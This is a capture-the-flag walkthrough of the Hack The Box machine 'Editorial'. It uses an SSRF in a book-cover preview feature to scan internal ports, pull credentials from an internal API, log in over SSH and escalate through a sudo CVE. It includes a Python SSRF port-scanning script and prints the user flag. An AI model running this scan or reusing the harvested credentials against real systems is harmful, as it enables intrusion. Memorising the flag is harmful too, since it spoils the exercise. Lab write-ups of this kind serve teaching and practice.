
HTB Linux Easy: Editorial

Editorial is an Easy rated Linux machine on HTB.


Nmap Scan


Add the editorial.htb domain to the hosts file so the virtual host resolves to the box.

Enumerate HTTP (Port 80)

The "Preview" button fetches a user-supplied URL server-side. To confirm the SSRF, put the Kali IP in the URL field, start a listener, and press "Preview": the callback from the target proves the server is making the request on our behalf.

Using the Repeater tab in Burp, we point the SSRF at 127.0.0.1 and iterate over ports, comparing each response to the one returned for a closed port. Port 5000 responds differently, so there is an internal service listening there.
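The manual Repeater loop above is tedious for a full port range. The script below automates it: it sends the SSRF URL for each port and flags any port whose response differs from the baseline returned for a port that is certainly closed. This is an added example, not code from the original post; the endpoint name /upload-cover and the form field names bookurl and bookfile are assumptions about how the preview request looks, and the fake_probe responses are constructed so the script runs offline.

```python
#!/usr/bin/env python3
"""Differential port scan through an SSRF (added example, assumptions noted inline)."""
import re
from typing import Callable, Dict, Iterable

# Assumed: the preview feature is a multipart POST to this endpoint with a 'bookurl'
# field holding the URL the server fetches. Not confirmed by the original post.
TARGET = "http://editorial.htb/upload-cover"
INTERNAL_HOST = "127.0.0.1"

# A probe takes the URL we want the server to fetch and returns the response body.
Probe = Callable[[str], str]


def ssrf_url(port: int, host: str = INTERNAL_HOST) -> str:
    """Build the URL the vulnerable server will fetch on our behalf."""
    return f"http://{host}:{port}/"


def find_open_ports(probe: Probe, ports: Iterable[int], baseline_port: int = 1) -> Dict[int, str]:
    """Return {port: body} for every port whose response differs from the baseline.

    The baseline is the response for a port that is almost certainly closed; a closed
    port makes the server fall back to its default cover image, so any other response
    means the internal fetch got a reply and the port deserves a closer look.
    """
    baseline = probe(ssrf_url(baseline_port))
    hits: Dict[int, str] = {}
    for port in ports:
        body = probe(ssrf_url(port))
        if body != baseline:
            hits[port] = body
    return hits


def live_probe(url: str) -> str:
    """Send the real request with requests; only used when run against the box."""
    import requests  # imported here so the offline demo needs no third-party package
    files = {
        "bookurl": (None, url),                              # assumed field name
        "bookfile": ("", b"", "application/octet-stream"),   # assumed empty file field
    }
    resp = requests.post(TARGET, files=files, timeout=10)
    return resp.text


def fake_probe(url: str) -> str:
    """Constructed stand-in for the target: only port 5000 'answers'.

    Response bodies here are made up to mimic 'uploaded cover path' vs 'default image'.
    """
    port = int(re.search(r":(\d+)/", url).group(1))
    if port == 5000:
        return "static/uploads/constructed-uuid"
    return "/static/images/default-cover.jpeg"


if __name__ == "__main__":
    # Offline demo; swap fake_probe for live_probe to run it against the box.
    for port, body in find_open_ports(fake_probe, range(1, 10001)).items():
        print(f"port {port} open, response: {body}")
```

Ports that are open but return a body identical to the fallback (for instance a service that times out) are missed by a pure content comparison; timing each probe and flagging outliers catches some of those.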

When we submit the SSRF URL for port 5000 through the image preview and open the Response tab in Burp, the server hands back what it fetched from the internal service: a list of API endpoints.

Next we walk those API endpoints through the same SSRF. The /api/latest/metadata/messages/authors/ endpoint returns sensitive information, including a set of credentials.

Since the Nmap scan showed SSH open, we use these credentials to log in.

User flag: 1b5f02e974b28e2a15ad1a6eb9f0800b

Lateral movement

Searching the git history on the box (the commit log and its diffs) turns up a second pair of credentials, which we use to move to the next user.

Privilege Escalation

Output of sudo -l:

What sudo lets us run is affected by a published CVE, which we use to get the root flag: CVE

PWNED!!!


This post is licensed under CC BY 4.0 by the author.